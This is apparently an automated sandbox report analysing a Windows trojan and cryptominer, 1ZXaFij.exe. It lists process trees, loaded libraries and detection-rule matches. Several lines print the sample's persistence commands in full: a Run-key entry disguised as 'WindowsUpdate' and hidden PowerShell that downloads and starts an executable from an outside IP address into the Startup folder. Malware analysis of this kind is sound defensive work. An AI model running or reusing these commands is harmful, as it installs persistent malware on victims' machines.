        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140015C902_2_0000000140015C90
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400C6D2C2_2_00000001400C6D2C
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004ED502_2_000000014004ED50
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014003DD602_2_000000014003DD60
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140021D802_2_0000000140021D80
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400DADE42_2_00000001400DADE4
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140002E252_2_0000000140002E25
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140029E302_2_0000000140029E30
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400DDE602_2_00000001400DDE60
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140049E692_2_0000000140049E69
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140002E732_2_0000000140002E73
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140003EA32_2_0000000140003EA3
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014000BEB82_2_000000014000BEB8
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014002DEF02_2_000000014002DEF0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400C6F302_2_00000001400C6F30
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014000FFA02_2_000000014000FFA0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014002CFD02_2_000000014002CFD0
        Source: C:\Windows\explorer.exeCode function: 23_2_11F375E023_2_11F375E0
        Source: C:\Windows\explorer.exeCode function: 23_2_11F8F1E023_2_11F8F1E0
        Source: C:\Windows\explorer.exeCode function: 23_2_11F541A023_2_11F541A0
        Source: C:\Windows\explorer.exeCode function: 23_2_11F3E8E023_2_11F3E8E0
        Source: C:\Windows\explorer.exeCode function: 23_2_11F458A023_2_11F458A0
        Source: C:\Windows\explorer.exeCode function: 23_2_11F3688023_2_11F36880
        Source: C:\Windows\explorer.exeCode function: 23_2_11F3376023_2_11F33760
        Source: C:\Windows\explorer.exeCode function: 23_2_11F2A32023_2_11F2A320
        Source: C:\Windows\explorer.exeCode function: 23_2_11F382E023_2_11F382E0
        Source: C:\Windows\explorer.exeCode function: 23_2_11F4CEC023_2_11F4CEC0
        Source: C:\Windows\explorer.exeCode function: 23_2_11F5E6C023_2_11F5E6C0
        Source: C:\Windows\explorer.exeCode function: 23_2_11F316BB23_2_11F316BB
        Source: C:\Windows\explorer.exeCode function: 23_2_11F7C6A023_2_11F7C6A0
        Source: C:\Windows\explorer.exeCode function: 23_2_11F2DA8023_2_11F2DA80
        Source: C:\Windows\explorer.exeCode function: 23_2_11F7328023_2_11F73280
        Source: C:\Windows\explorer.exeCode function: 23_2_11F2222023_2_11F22220
        Source: C:\Windows\explorer.exeCode function: 23_2_11F23E0023_2_11F23E00
        Source: C:\Windows\explorer.exeCode function: 23_2_583558A023_2_583558A0
        Source: C:\Windows\explorer.exeCode function: 23_2_5834688023_2_58346880
        Source: C:\Windows\explorer.exeCode function: 23_2_5834E8E023_2_5834E8E0
        Source: C:\Windows\explorer.exeCode function: 23_2_583641A023_2_583641A0
        Source: C:\Windows\explorer.exeCode function: 23_2_583475E023_2_583475E0
        Source: C:\Windows\explorer.exeCode function: 23_2_5839F1E023_2_5839F1E0
        Source: C:\Windows\explorer.exeCode function: 23_2_5833222023_2_58332220
        Source: C:\Windows\explorer.exeCode function: 23_2_58333E0023_2_58333E00
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: String function: 0000000140010320 appears 90 times
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: String function: 000000014000F310 appears 68 times
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: String function: 00000001400C53DC appears 120 times
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: String function: 000000014000EF70 appears 63 times
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7188 -s 7020
        Source: 1ZXaFij.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
        Source: runps.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
        Source: dump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: 00000017.00000002.1681510844.0000000010AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000017.00000002.1682248849.00000000111A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000017.00000000.1514869654.00000000111A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000017.00000000.1543470099.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 00000017.00000000.1514246330.0000000010AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: classification engineClassification label: mal100.troj.adwa.expl.evad.mine.winEXE@40/50@5/6
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140063EB0 GetFileAttributesW,CreateProcessWithLogonW,GetLastError,CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,CloseHandle,GetLastError,FormatMessageW,2_2_0000000140063EB0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400270AC GetDiskFreeSpaceW,GetLastError,2_2_00000001400270AC
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400711A0 OpenProcess,GetProcessId,WaitForSingleObject,CloseHandle,GetLastError,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,CloseHandle,2_2_00000001400711A0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140034350 CoCreateInstance,CoTaskMemFree,CoTaskMemFree,2_2_0000000140034350
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014004810C CharUpperW,CompareStringOrdinal,FindResourceW,LoadResource,LockResource,SizeofResource,GetCPInfo,FindResourceExW,2_2_000000014004810C
        Source: C:\Users\user\Desktop\1ZXaFij.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7188
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6148
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2500
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlwxuz1k.bpq.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: unknownProcess created: C:\Windows\explorer.exe
        Source: 1ZXaFij.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 1ZXaFij.exeVirustotal: Detection: 55%
        Source: 1ZXaFij.exeReversingLabs: Detection: 42%
        Source: C:\Users\user\Desktop\1ZXaFij.exeFile read: C:\Users\user\Desktop\1ZXaFij.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\1ZXaFij.exe "C:\Users\user\Desktop\1ZXaFij.exe"
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe"
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D6A.tmp" "c:\Users\user\AppData\Local\Temp\CSC95BE416761534B22A9BF915F54099EA.TMP"
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7188 -s 7020
        Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6148 -s 8632
        Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2500 -s 7024
        Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"Jump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /fJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /fJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D6A.tmp" "c:\Users\user\AppData\Local\Temp\CSC95BE416761534B22A9BF915F54099EA.TMP"Jump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\RoamiJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\RoamiJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: winhttpcom.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
